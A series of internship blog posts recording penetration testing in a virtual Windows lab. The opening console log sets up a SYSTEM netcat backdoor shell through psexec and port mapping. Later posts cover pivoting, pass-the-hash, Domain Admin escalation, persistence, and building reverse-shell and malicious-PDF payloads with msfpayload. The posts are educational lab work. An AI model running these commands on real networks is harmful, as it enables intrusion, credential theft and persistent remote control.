C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

192.168.1.188 is not an acceptable value for proto.
netsh exited on srv-DC with error code 1.

/* Oops, missed a necessary argument. Added it and tried again but things got screwed for unknown reasons and I had to exit and rerun the exploit to start a new session. */

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

Terminate channel 1? [y/N]
n

Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter >
meterpreter >
meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > background
msf exploit(handler) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter NT AUTHORITY\SYSTEM @ WKS-XP1 192.168.1.188:31337 -> 192.168.1.250:62571

msf exploit(handler) > sessions -i 1
[-] Invalid session identifier: 1
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > exit

[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 3 opened (192.168.1.188:31337 -> 192.168.1.250:61734)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 3
[-] The 'stdapi' extension has already been loaded.

meterpreter > pwd
C:\WINDOWS\TEMP
meterpreter > shell
Process 308 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

The static port mapping from 192.168.1.188/9999 to 192.168.2.50/9999 requires 192.168.1.188 to be part of a configured address range. To define a static port mapping on this interface's assigned IP address, please specify 0.0.0.0 as the public address for the mapping.

netsh exited on srv-DC with error code 1.

/* I was trying to limit access to only wks-Matriux. It didn't work and it was too late at night to understand why, so I just set to 0.0.0.0 */

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999

netsh exited on srv-DC with error code 0.

/* OK, I think I now have portmapping and a firewall rule in place :) */

C:\Program Files\ps>netsh
exit
exit

/* Hanging screwiness follows, had to terminate and re-establish session */

Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter > it
[-] Unknown command: it.
meterpreter > exit

[*] Meterpreter session 3 closed. Reason: User exit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 4 opened (192.168.1.188:31337 -> 192.168.1.250:61737)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 4
[-] The 'stdapi' extension has already been loaded.

meterpreter > shell
Process 1008 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
Ok.

/* This is adding the firewall opening to the local workstation. Netsh is different on XP */

C:\Program Files\ps>schtasks /?
schtasks /?

SCHTASKS /parameter [arguments]

Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.

Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.

Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?

C:\Program Files\ps>schtasks /create /?
schtasks /create /?

SCHTASKS /Create [/S system [/U username [/P password]]]
[/RU username [/RP password]] /SC schedule [/MO modifier] [/D day]
[/I idletime] /TN taskname /TR taskrun [/ST starttime] [/M months]
[/SD startdate] [/ED enddate]

Description:
Enables an administrator to create scheduled tasks on a local or
remote systems.

Parameter List:
/S system Specifies the remote system to
connect to. If omitted the system
parameter defaults to the local
system.

/U username Specifies the user context under
which the command should execute.

/P password Specifies the password for the given
user context.

/RU username Specifies the user account (user
context) under which the task runs.
For the system account, valid values
are "", "NT AUTHORITY\SYSTEM" or
"SYSTEM".

/RP password Specifies the password for the user.
To prompt for the password, the value
must be either "*" or none.
Password will not effect for the
system account.

/SC schedule Specifies the schedule frequency.
Valid schedule types: MINUTE, HOURLY,
DAILY, WEEKLY, MONTHLY, ONCE,
ONSTART, ONLOGON, ONIDLE.

/MO modifier Refines the schedule type to allow
finer control over schedule
recurrence. Valid values are listed
in the "Modifiers" section below.

/D days Specifies the day of the week to run
the task. Valid values: MON, TUE,
WED, THU, FRI, SAT, SUN and for
MONTHLY schedules 1 - 31 (days of the
month).

/M months Specifies month(s) of the year.
Defaults to the first day of the
month. Valid values: JAN, FEB, MAR,
APR, MAY, JUN, JUL, AUG, SEP, OCT,
NOV, DEC.

/I idletime Specifies the amount of idle time to
wait before running a scheduled
ONIDLE task.
Valid range: 1 - 999 minutes.

/TN taskname Specifies a name which uniquely
identifies this scheduled task.

/TR taskrun Specifies the path and file name of
the program to be run by this
scheduled task.
Example: C:\windows\system32\calc.exe

/ST starttime Specifies the time to run the task.
The time format is HH:MM:SS (24 hour
time) for example, 14:30:00 for
2:30 PM.

/SD startdate Specifies the first date on which the
task runs. The format is
"mm/dd/yyyy".

/ED enddate Specifies the last date when the task
should run. The format is
"mm/dd/yyyy".

/? Displays this help/usage.

Modifiers: Valid values for the /MO switch per schedule type:
MINUTE: 1 - 1439 minutes.
HOURLY: 1 - 23 hours.
DAILY: 1 - 365 days.
WEEKLY: weeks 1 - 52.
ONCE: No modifiers.
ONSTART: No modifiers.
ONLOGON: No modifiers.
ONIDLE: No modifiers.
MONTHLY: 1 - 12, or
FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY.

Examples:
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN rtest2 /TR calc.exe /ST 12:00:00
/SD 10/20/2001 /ED 10/20/2001 /RU runasuser /RP
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN game
/TR c:\windows\system32\freecell
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC WEEKLY /TN test1 /TR notepad.exe
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN test2 /TR c:\windows\system32\notepad.exe
/ST 18:30:00 /RU runasuser /RP *
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN cell
/TR c:\windows\system32\freecell /RU runasuser

/* They don't give an example of how to pass arguments to a task or how to use a task path with spaces, thanks MS :| Experimentation is painful in the console with no tab completions. The easiest way to do this is to either use short pathnames (progra~1) or to create a batch file with your command line in it, then use the task to call run that. */

C:\Program Files\ps>schtasks /?
schtasks /?

SCHTASKS /parameter [arguments]

Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.

Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.

Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?

C:\Program Files\ps>schtasks /change /?
schtasks /change /?

SCHTASKS /Change [/S system [/U username [/P password]]] {[/RU runasuser]
[/RP runaspassword] [/TR taskrun]} /TN taskname

Description:
Changes the program to run, or user account and password used
by a scheduled task.

Parameter List:
/S system Specifies the remote system to connect to.

/U username Specifies the user context under
which the command should execute.

/P password Specifies the password for the given
user context.

/RU username Changes the user name (user context) under
which the scheduled task has to run.
For the system account, valid values are
"", "NT AUTHORITY\SYSTEM" or "SYSTEM".

/RP password Specifies a new password for the existing
user context or the password for a new
user account. Password will not effect for
the system account.

/TR taskrun Specifies a new program that the scheduled
task runs. Type the path and file name of
the program.

/TN taskname Specifies which scheduled task to change.

/? Displays this help/usage.

Examples:
SCHTASKS /Change /RP password /TN "Backup and Restore"
SCHTASKS /Change /TR restore.exe /TN "Start Restore"
SCHTASKS /Change /S system /U user /P password /RU newuser
/TN "Start Backup"

C:\Program Files\ps>schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"

schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"

INFO: The Schedule Task "listen" will be created under user name ("NT AUTHORITY\SYSTEM").
SUCCESS: The scheduled task "listen" has successfully been created.

C:\Program Files\ps>exit
meterpreter > exit

[*] Meterpreter session 4 closed. Reason: User exit
msf exploit(handler) >

/* After all this, I had successfully set up: portmapping on srv-DC - 192.168.2.1:9999 -> 192.168.2.50:9999 firewall rule on srv-DC - allow tcp from any to any 9999 in firewall rule on wks-xp1 - allow tcp from any to any 9999 in task scheduled to run netcat (as system) at logon, listen on 9999 and provide a command shell to any connection. I tested this and can now successfully connect from outside the gateway: nc -nvv 192.168.1.250 9999 (srv-DC OutsideNIC) */

SimWitty Internship: Week 13

2010-04-11T22:56:00.001-05:00

Well, this week is going to be kind of hard to write up. There was so much going on with trying to attack the other VMs that is began to blur somewhat in my head. I tried to keep notes as much as possible but it still may seem a bit confused.

Let's see, for starters... I got wks-XP1 compromised and set up the meterpreter reverse tcp executable to try connecting back to me every 5 minutes. This worked good and gave me an easy way back in to the machine. I was then able to use the meterpreter session to install winpcap and nmap on wks-XP1.

Installing WinPcap and Nmap
The easiest way to get the right files to install for winpcap is to install it to a VM with matching OS of your target (I just used the actual VM in the case of this lab, then uninstalled it when I had what I wanted). Then create a folder to hold your files, and copy the following to your folder:

c:\windows\system32\Packet.dll
c:\windows\system32\pthreadVC.dll
c:\windows\system32\wpcap.dll
c:\windows\system32\drivers\npf.sys

If you want to install the whole thing so it can be uninstalled, also copy over the files in c:\program files\winpcap and export the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WinPcapInst so you can import it on the target. For Nmap, you want to download the zipfile they make available for Windows. Unzip the file into a subfolder with your winpcap files i.e.:
\---tools
+---nmap
\---winpcap

To install WinPcap, do the following:

Connect via meterpreter to the target (you will need admin privs)
Change your local working directory to where you have your winpcap files
Change your target working directory to C:\windows\system32 (don't forget you need double backslashes for the path in meterpreter)
Upload Packet.dll, pthreadVC.dll, and wpcap.dll
Change target working directory to C:\windows\system32\drivers
Upload npf.sys
Open a shell on the Victim

To create the service, run this command: (pay attention to weird MS space usage)
sc create npf type= kernel start= auto error= normal binpath= "c:\windows\system32\drivers\npf.sys"

To install Nmap do the following:

cd to c:\program files
mkdir nmap
cd nmap
Jump back to meterpreter prompt
Upload the nmap files
Jump back to a command shell (be sure your in the nmap directory) and execute the following:

vcredist_x86.exe /q:a /c:"msiexec /i vcredist.msi /qn /l*v %temp%\vcredist_x86.log"
The vcredist bit is courtesy of MSDN

You should now have working copies of Nmap and WinPcap on the victim. Start WinPcap: net start npf, then check Nmap nmap --version

After installing both on wks-XP1, I ran a scan of the subnet and output to xml. I then downloaded (via meterpreter) the xml file to the attack VM. I tried importing into a new workspace in the db (figuring you have already connected to the db):
db_workspace -a nmap
db_workspace nmap
db_import_nmap_xml /path/to/xml_file
I made sure that metasploit was routing 192.168.1.0/24 thru the active session, and then tried db_autopwn but it didn't work.

Finally I decided to try using exploit/windows/smb/psexec (thank you YouTube for the Mubix Video). I had the existing meterpreter session connected back to port 31337 so I set LPORT for this instance to 31336. I used the SMBUser Administrator, SMBPass I pasted in the admin hash I got from running hashdump in the meterpreter session. I set the RHOST accordingly for each succesive attempt, starting with wks-XP2 at 192.168.2.51. This worked fine, and allowed me to use hashdump on each machine to get the password hashes. Unlike the video though, this would NOT work against the Domain Controller (srv-DC).

I tried numerous times with different names and hashes against srv-DC. All returned either STATUS_LOGON_FAILURE or STATUS_ACCESS_DENIED. I am not exactly sure why this is. In the time I had to investigate, I found a link talking about NullSessionPipes that may have something to do with it. I never was successful running this exploit against the DC, but I was able to add a user to the Domain Admins group, I don't know exactly why one worked and the other didn't. The syntax for the incognito command add_group_user is a little weird, it is add_group_user -h DC>

Getting into the Domain Controller needs more investigation and I think I will stretch it into next week a little. I hope this didn't come out as too much of a jumble, it sure felt like one.

SimWitty Internship: Week 12

2010-04-04T23:41:00.000-05:00

The task this week was to try and determine ways to create a foothold on the compromised machine and pivot the attack to the rest of the network. Seeing as how I only got meterpreter injected into a process with non-admin privileges I thought this was going to be very tough. I realize that it is possible to load the priv extension and run getsystem. I tried that, but there is a problem with it in the VirtualBox environment. It uses the "KiTrap0D" vulnerability for escalation. When you try this in VirtualBox (3.1.4) it crashes the VM and brings up a "Guru Mediation" message.

I spent a lot of time during the week reading up on different types of privilege escalation methods, concentrating more on older methods because these are old, unpatched machines. I was trying everything from the shatter attack to abusing service permission levels and nothing was working, I was starting to have a bad feeling. Finally I found a solution. I was just over thinking things. The key to it all is routing, and that is made simple thanks to the great people working on Metasploit.

What you need to do is establish the first session, then send it to the background. At the msfconsole prompt, use the route command (-h for help) to add a route to the 192.168.2.0/24 network using the meterpreter session number (1 in my case) as the gateway i.e. route add 192.168.2.0 255.255.255.0 1. Once this is done, switch to a good ole exploit like ms08-067 netapi. You then set the RHOST to the machine you have session 1 open on and exploit it. Soon you should have a session 2 coming back to you and this time when you getuid you should see NT AUTHORITY\System. At that point I like to remove the routing entry, kill session 1 and redo the route entry using session 2. Once this is done you can hit any other machine on that network.

As to the question of establishing a foothold, I tried a few methods. There is a meterpreter script called persistence that is supposed to automate this (details here) but I didn't have any luck with that method. It just wrote its vbs script in Windows\temp and nothing else. I also experimented with manually making an executable with a meterpreter/reverse_tcp payload. I uploaded this to the victim then manually linked it in the HKLM run key, but this didn't work either. The one thing that did work for me was to use the scheduleme script to set up a constantly running task with this exe. I set it to try and connect back every 5 min and it worked like a charm, although I realize this is a very obvious and noisy method. I was a little worried about it spawning a hundred instances on the victim but it seemed that as long as one was running, another wouldn't start. You could further customize the instance by opening a shell and using schtasks

The next goal is to see what other machines I can compromise. It would be nice to be able to route nmap through meterpreter sessions, but I haven't figured out a way to do this yet. There is a video I looked at briefly that shows how to tunnel a nessus scan through meterpreter using ssh that might be adaptable for nmap (links here). Even without that I can always just upload and install nmap and go from there. Metasploit does have some scanners available, but not as good for general recon as nmap. More next week.

SimWitty Internship: Week 11

2010-03-30T22:02:00.000-05:00

Well I'm finally here with this week's post. Better late than never is what they tell me. This week and last week were sort of a combination or crossover. First I had to set up a method to monitor change, then I had to try running actual exploits and save information that might indicate a compromise. The two haven't totally come together yet because my first attempt at exploit was only able to get into a non-admin process. I could see changes in memory usage but nothing very exciting. As I research how to increase privileges and pivot from the original machines, I hope to have more to report.

The first exploits I ran were to simulate client side attacks. One involved creating a malicious pdf file with Metasploit and opening it on the victim machine. This was meant to simulate a malicious email attachment. The other involved setting up Metasploit to serve up a malicious web page. This would simulate someone clicking on a malicious link, either within an email or on a web page. The exploits that I tried were:

pdf

adobe_utilprintf
adobe_flatedecode_predictor02
adobe_geticon
adobe_jbig2decode (process)
adobe_jbig2decode (seh)

browser

ms10_002_aurora
ani_loadimage_chunksize
ie_createobject

The machines I am attacking are both XP Pro SP2. The browser is IE6 and the version of Acrobat reader is 8.1. The users that executed the exploits were both non-admin. The exploits that worked were the jbig2decode and ie_createobject. Since the users were not running in administrator accounts I wasn't able to accomplish much. I was able to migrate to processes that they owned. I couldn't steal any tokens to escalate my privileges, so I couldn't migrate to any other processes. I could read and write within my own directory areas. I could read the registry but not write to it (at least not hlkm).

I can now see the proof that it is a good idea to run as non-admin. This week's work will involve trying to find a way to increase my privileges and pivot the attack to other machines on the internal LAN.

SimWitty Internship: Week 10

2010-03-22T00:33:00.004-05:00

Goals
This week my goal was to come up with a baseline measurement of critical areas on the machines I will be attempting to breach. I believe there are three critical areas to pay attention to:

The Event Logs
Proper control needed for audit settings/group policy
The File System
Admin must be aware of permissions and able to track changes
Performance Counters
Comparison against baseline may illuminate security problems

Event Logs
The event log system has changed greatly in the post XP world. Starting with Windows Vista there are many different log types and ways to view them. I am almost of the opinion that Microsoft has overdone it and is causing information overload. This is mainly because I am not yet used to the new system; I'm sure once an admin gets familiar with the increased granularity, the new Event system will prove to be a great tool. More visibility is a good thing. There is a good article concerning the new system at http://technet.microsoft.com/en-us/magazine/2008.03.auditing.aspx

The security log can be of great use in trying to determine if something is going wrong on a system, but it isn't much good if you don't set your audit policy properly. Some of these settings may create too much noise for a real world scenario. The good news is that in the post XP world, you can exert really fine control over audit policy by using the command line tool auditpol.exe... try typing auditpol
/list /subcategory:* at the command prompt to get an idea of what's available. Since this is a lab, I am enabling almost all auditing. I will propagate the settings through group policy. I have set up a GPO in active directory to apply to the SimWitty OU that I created.

File System
The file system is another place that you can spot signs of a problem. Obviously, sudden appearance of unknown files or folders could be a sign of a breach. A little less obvious sign could be changes in permissions. You can (on Vista and later) record the file permissions by using the icacls.exe tool. The following command would record permissions for files in c:\windows and below:

icacls c:\windows\*.* /save Baseline_ACLfile /T

You should then be able to redo this whenever you want, and compare against the baseline to see what may have changed (the files are sddl format listings and are unicode text). The benefit of these ACL files is that you can use them to restore permissions. Another (maybe simpler) way to get a baseline is to use a few commands such as:

dir /s /b c:\windows\*.* > dir_plain_baseline.txt
dir /s /b /ah c:\windows\*.* > dir_hidden_baseline.txt
dir /s /b /as c:\windows\*.* > dir_system_baseline.txt

Vista has a new switch for the dir command (/r) that will even show alternate data streams, but it isn't very useful; it shows files with and without ADSs and it breaks when used with the /b(are) switch. Maybe it would be useful within powershell, or with some other additional filtering.

Performance Counters
The performance monitoring capabilities are worlds better in the post XP world. Now called the Reliability and Performance Monitor, this MMC snap-in is a HUGE advance. A data collector set consists of three different modules. It can be created by right clicking user defined under Data Collector Sets and choosing new. After you set some properties, the collector set will appear and you can see the three modules (Performance Counter, Configuration, and Kernel Trace) by selecting the set. Right clicking each module and choosing properties allows you to add the desired counters.

The template I used in Server 2008 adds all counters for processor by default. There were a few more that I thought would be useful, so I added

\Memory\Available KBytes
\Memory\Committed Bytes
\Objects\Threads
\Objects\Processes
\Objects\Mutexes
\Process(_Total)\Virtual Bytes
\Process(_Total)\Working Set
\Process(_Total)\Handle Count

Once the trace has been run, the snap-in automatically produces a very slick report. The report can be viewed from within the snap-in, either as a report or graphically by right clicking the report and choosing view, or as an html report with IE.

All the above tools are native to the operating system. By using these tools and setting up a good baseline, I hope to be able to detect any changes that may occur through the penetration testing.

SimWitty Internship: Week 9

2010-03-14T19:51:00.004-05:00

I finished the lab installation/setup documentation this week. It came in at 21 pages and hopefully will work for anyone wishing to duplicate the lab. The document can be seen here [Word doc]. I also came up with a series of 6 tasks to fulfill the lab. Here is the basic list of remaining tasks:

Set up exploits and get a baseline of the systems.
Execute the exploits and investigate results.
Investigate methods to pivot within the LAN.
Attempt to compromise other machines.
Investigate results of monitoring.
Finalize documentation of lab results.

More details on each task can be seen here [Word doc].

I also did a slight revamp of the network design. The "internet facing" domain controller is now using a VirtualBox NAT interface rather than bridged. This will make scanning of the LAN from the outside much more difficult, more accurately simulating a well firewalled corporate LAN. I also moved the database services off of the domain controller and onto the Snort server. I think this more closely mirrors the real world.

SimWitty Internship: Week 8

2010-03-07T23:43:00.000-06:00

This week's blog isn't going to be real verbose. My two main tasks the last two weeks have been to come up with an actual plan of attack and to document a standard for the installation of all components of the lab. I am going to have to go a bit past deadline on this one, as creating good documentation is a lot of work.

The good news is that I have figured out my connectivity problems and can now reliably connect from the internal network to the external network. This bodes well for the actual successful completion of the lab.

As far as the actual attacks go, I am keeping it pretty generic. I am going to use Metasploit to produce simulated client side attacks. The internal network has two workstations. One of these will get a malicious document attached through simulated email and the other will get a malicious web link through simulated email. The goal of the attacks is to see what kind of pivot can be made into the internal network. The preferred method of attack will be through the use of meterpreter sessions due to the fact that they are the stealthiest and would be the sweetest to detect.

The documentation is the hard part. Even on a small simulated network with two servers and two workstations there is a ton to write. I have to cover installation of the server OS, the workstation OS, the installation and configuration of Active Directory and other server roles such as: DHCP, DNS, and RRAS. Once that is documented I have to install, configure, and document SQL Server 2008 and Snort.

One thing I will post up here on the blog, because it could be useful to others, concerns the Server 2008 OS and automatic activation. Microsoft offers the OS as a 60 day trial which can be legally "rearmed" three times before it has to be activated. This is a great feature, and wonderful for learning and testing. The problem with this is that the OS is set up to automatically go online and activate itself three days after the first logon. You can see this by looking at the system properties (start, right click computer, choose properties). This is very problematic in a lab environment, since you may well be wiping and reinstalling as you make mistakes and learn from them.

In searching for a solution, I saw many people who said that if you didn't enter a product key during install, then you wouldn't have the activation problem. The problem with this is that I was never presented with an opportunity to insert my product key during the OS install. Well, after lots of searching I found a solution on technet (http://technet.microsoft.com/en-us/library/cc770903%28WS.10%29.aspx). There is a registry setting that controls this behavior. The key is at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SL\Activation look for the value Manual and change it from zero to one. You can see the effects immediately when you reopen system properties. The windows activation section should now show 59 days left til activation. To rearm the counter, you can use c:\windows\system32\slmgr.vbs If you read this file in notepad, you will see the different switches that can be used.

SimWitty Internship: Week 7

2010-02-28T21:53:00.000-06:00

Well, I've got a lot of ground to cover this week and next. The first thing that I have been working on this week was trying to document a standard method for creating and installing the Virtual Network that I will be using for the upcoming lab. This entails documenting the setup of the two servers and the two workstations, and all the myriad settings involved.

It is kind of a pain having to work around Windows activation. At the start of the internship I was pretty excited, so I installed the servers and workstations without meticulously documenting every step. Now I am faced with having to kind of "roll back" everything I have done so that I can describe it. I am afraid to just delete the existing VMs and start over again for fear of setting off activation protections and being denied the ability to reinstall them at all. Note to self, be more restrained in the future.

I figured I would have to do some brushing up on Active Directory and such. It's been awhile since I took any server focused classes but I figured no big deal. Then I ran into my first major hurdle. When I was first testing the idea for this lab, I hadn't actually experimented with my proposed routing scheme. I just wanted to be sure that I could see all the traffic on the wire. Now I am rapidly discovering that 1.) I need a lot of brush up on routing tasks, or 2.) there is something going on due to this being a virtual set up that is causing problems.

If you recall week five's theoretical network diagram, I wanted to set up the main server (AD domain controller and database server) as a dual homed machine. The 'exterior' NIC would be either VirtualBox bridged or NAT and the 'interior' NIC would be VirtualBox internal networking. My problem is that I cannot get the server to route between the two interfaces.

I thought I would keep it simple at first, and just enabled IPEnableRouter in the registry and added a static default route to the external IP. This didn't work though. I next tried installing and configuring Routing and Remote Access and couldn't make that work either. I have manged to get the DNS and DHCP going but this damn routing is killing me. I haven't yet decided if it is a problem because of the 'virtualness' of the network or just that I am doing something wrong. I need to maybe try the VirtualBox host only interface and see if that works. Will have to get this figured out fast, because this coming week is the most important part of the project.

Next week the focus is on coming up with an actual plan of attack for the lab, and writing up a proposal for the idea. I need to get input from my adviser and other team members, adjust the proposal accordingly and then write it up. I rate this as a very important task so I will have to solve this routing dilemma ASAP.

SimWitty Internship: Week 6

2010-02-22T01:48:00.000-06:00

This week was spent doing more work with Snort to get it running proper in the virtual network. In a Windows environment, that is a lot of work with piss-poor documentation... so I hope I am making a valued contribution on that level by writing all this out.

The Simwitty project is working on a base set of instructions to govern getting Snort and MS SQL set up, just so everyone is on the same page. I followed these basic rules to get started but it took quite a bit of tweaking for things to start working. I documented all the steps I took for the install and that file will be available on the Simwitty Redmine pages.

The first issue I had (as noted last week) was that Snort wasn't talking to the database. This was even after I located a copy of ntwdblib.dll (I also found out I needed msvcr71.dll on this particular machine). I found a tip from Microsoft for testing the connection to a SQL Server. This entailed creating a file with a .udl extension, which will open as a shell dialog when double clicked, but in reality is just a text file. Details at How to connect to an instance of SQL Server Desktop Edition or of SQL Server 2005 Express Edition (http://support.microsoft.com/kb/319930) under the Verify connectivity section.

Once I created this file, it would connect fine but Snort was still a no go. I fired up Wireshark to see what was uhappening. In looking at the packets I could see the difference between the good connection and the failed connection. The thing that stood out was the difference between two strings.

Connect reads SQLEXPRESS and fail reads MSSQLServer. Thank God I am working with people that understand SQL Server, because I am very new to it. It was immediately pointed out to me that I must be running an instance with the name of SQLEXPRESS. By adding this to my snort.conf in the host definition of the database output section (sort of like a UNC, host=192.168.2.10\SQLEXPRESS) I was up and running.

Now it was just the ugly task of installing the Snort rules. As far as I could find, this procedure isn't clearly documented anywhere. At least nothing warned me of things like: 1) The snort.conf included with the snapshot is old and broken. Keep the one you modified from the install. 2) What's with the so_rules folder, is it necessary? I figured it was *nix related and deleted it. 3) Some files are newer in the snapshot, some files aren't. How to decide what to keep? 4) For crying out loud, do I need to install that signatures directory with its 16,000 files? It's a very frustrating experience and I am going to upload a file to the Simwitty Redmine detailing my travails.

SimWitty Internship: Week 5

2010-02-14T22:18:00.000-06:00

This week I was doing some thinking about how I want to configure my network within VirtualBox. As of right now it will be populated by two workstations and two servers. The workstations both run Windows XP pro sp2 and the Servers both run Windows Server 2008 Standard edition.

One server will be configured to run the Snort engine and the other will be the database server. The database server will also be running: Active Directory as a domain controller, IIS, DNS, probably DHCP, and probably RRAS. VirtualBox can run its own DHCP server for internal networks (which this will be) via the command line VBoxManage, but I thought having the DHCP on an actual VM might make it more controllable.

The two XP machines will be domain members. I haven't decided whether to join the Snort machine to the domain. I guess I should since it can't run in stealth mode anyway, being a Windows box.

The Matriux machine is going to be an outsider for starters and we'll go from there. With the plan being to try client side attacks against the XP machines, I'm hoping the bad connections they make (to Matriux box) will be routed out to Matriux via the Domain Controller and if all goes according to plan the Snort machine will record everything. This is a conceptual map of what I am trying to achieve:

I have also been working on getting Snort installed on its machine. All is going well, and I went by our "Snort Integration v1 (draft)" It runs and logs just fine on the local machine but I am having a hell of a time getting it to connect to the DB server. For something in such wide use, Snort is one of the most difficult and poorly documented programs ever... Especially on Windows and Especially using MS SQL.

It took me a long time to find a trustworthy version of ntwdblib.dll, an old MS SQL interface library that Snort needs. I'm not even sure that SQL Server 2008 supports being used in this way. I think this will be the most difficult thing to get working. Well, at least my final class is over now so I have more time to dedicate to getting this thing working.

SimWitty Internship: Week 4

2010-02-07T18:14:00.007-06:00

This week I went a lot more in depth with my study of the Metasploit Framework (thank you offensive-security.com, I promise I will donate to HFC as soon as I can afford it). What is the main thing I learned this week?

Metasploit is scary!

I had done a lot of messing about with the msf3 in previous classes, but mainly just simple reverse shells. This week I started exploring some of Metasploit's other possibilities such as executable creation, malicious pdf creation, and usage of Meterpreter sessions. Meterpreter is the reason for my conclusion that msf3 is a scary tool.

For starters, I tried my hand at creating some executable files using msfpayload. This can be done from the command line without having to start the framework:

./msfpayload windows/meterpreter/bind_tcp LHOST=192.168.2.200 LPORT=31337 X > /home/tiger/temp/msf_met.bind.tcp.exe

I uploaded this file to VirusTotal and it was detected by 12/39 engines (link to results) As per the instructions in the Metasploit Unleashed lesson (ch 8, Antivirus Bypass) I attempted using a payload of type windows/shell/reverse_tcp:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.200 LPORT=31337 X > /home/tiger/temp/msf_shell.rev.tcp.exe

This executable was still detected by 11/40 engines (link to results). Although both of these were detected by some of the antivirus engines, the antivirus on my machine (Avast) picked up neither.

Next I thought I would try my hand at a malicious pdf. I did this from within the console:

use exploit/windows/fileformat/adobe_utilprintf
set OUTPUTPATH /home/tiger/temp
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.200
set LPORT 31337

You then just use the exploit command and the file will be created. This was detected by 11/40 engines (link to results). Thankfully, this was actually identified by my AV as: JS:Pdfka-AK [Expl].

Using Didier Stevens pdfid (http://blog.didierstevens.com/programs/pdf-tools/) it can be seen that there is both JavaScript and an OpenAction within this file:

C:\Documents and Settings\Jeff\My Documents\VirtBox_shared>pdfid msf.pdf
PDFiD 0.0.9 msf.pdf
PDF Header: %PDF-1.5
obj                    6
endobj                 6
stream                 1
endstream              1
xref                   1
trailer                1
startxref              1
/Page                  1(1)
/Encrypt               0
/ObjStm                0
/JS                    1
/JavaScript            1(1)
/AA                    0
/OpenAction            1(1)
/AcroForm              0
/JBIG2Decode           0
/RichMedia             0
/Colors > 2^24         0

If you want to use Didier's pdf-parser tool, you can even view the obfuscated JavaScript within the file.

[click any picture to see a large version of it]

Next I decided to experiment with Meterpreter sessions. I moved my msf_met.bind.tcp.exe file over to the VictimXP machine and double clicked it. It showed up in as a listener in netstat and as a process in Process Explorer.

